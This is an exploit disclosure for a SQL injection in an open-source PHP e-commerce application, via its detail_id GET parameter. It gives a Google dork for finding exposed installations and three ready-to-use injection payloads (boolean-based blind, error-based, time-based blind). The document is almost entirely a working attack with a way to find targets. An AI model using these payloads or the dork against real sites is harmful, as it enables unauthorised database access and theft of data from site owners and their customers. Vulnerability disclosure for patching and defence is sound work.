# Exploit Title: Ecommerce dynamic v1 - Sql Injection # Google Dork: intext:"Ecommerce-dynamic-website" # Date: 2024-12-28 # Exploit Author: Parastou Razi # Contact: razi.parastoo@gmail.com # Tested On: Windows, Firefox # Github Link: https://github.com/Pratikginoya/Ecommerce-dynamic-website-with-admin-panel-using-php # Version: 1 # Tested on: Windows 10 x64 Proof of Concept: 1. Description: A SQL injection vulnerability exists in Ecommerce dynamic Open Source System v1 via the "detail_id" parameters in GET request sent to php. 2. Proof Parameter: detail_id (GET) Type: boolean-based blind Payload: detail_id=5' AND 3583=3583 AND 'parastou'='parastou Type: error-based Payload: detail_id=5' AND (SELECT 7540 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(7540=7540,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'parastou'='parastou Type: time-based blind Payload: detail_id=5' AND (SELECT 1035 FROM (SELECT(SLEEP(5)))VAUv) AND 'parastou'='parastou